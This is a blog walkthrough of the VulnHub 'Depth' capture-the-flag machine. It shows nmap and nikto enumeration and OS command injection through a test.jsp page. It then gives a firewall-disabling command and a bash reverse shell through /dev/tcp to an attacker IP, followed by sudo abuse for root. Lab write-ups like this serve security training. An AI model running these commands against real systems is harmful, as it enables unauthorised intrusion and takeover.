Hi guys, Warm welcome to my blog. Today we going to discuss about depth vulnhub machine and is a very easiest machine that is coming up with OS command injection vulnerability on the debugging page and its running on the java server
To escalate the root privilege we want to abuse the sudo binary.
So first fire up your machine in your virtual box
Download the machine: https://www.vulnhub.com/entry/depth-1,213/
As usual we startup with a nmap scan
STEP 1: nmap -sC -sV 192.168.0.12
Further analyzing this nmap result I have found some interesting services and ports which is SSH in 22 and HTTP in 8080 etc.
So let us visit that web page which is http://192.168.0.12:8080
Here I have checked all links but nothing should be interesting.
So further I enumerated using the nikto tool
STEP 2: nikto -h http://192.168.0.12:8080
After analyzing this report I have found one interesting file which is test.jsp
So let's check it this http://192.168.0.12:8080/test.jsp
Further analyzing this web page I found that this page is affected by os command injection vulnerability which we can able to run the system command.
So first I tried
STEP 3: ls -l /tmp
Now it will list the file from the tmp folder
So next I tried for home directory
STEP 4: ls -l /home
Now you get the username of that system which is bill
So next I disabled the firewall of that machine
STEP 5: ssh bill@localhost sudo ufw disable
Next, we going to write the reverse shell
Before that setup your listener
STEP 6: nc -lvp 4242
STEP 7: ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.0.2/4242 0>&1
Booooooooommmmmmm!!!!!
Now you get the user shell of that machine
To escalate the root privilege we go for sudo binary abuse
STEP 8: sudo -l
STEP 9: sudo su
Booooooooommmmmmmmmm!!!!
Now you will get the root shell
STEP 10: cd root
STEP 11: cat flag
I hope you will understand this article if you like this please donate to us
OSCP student:
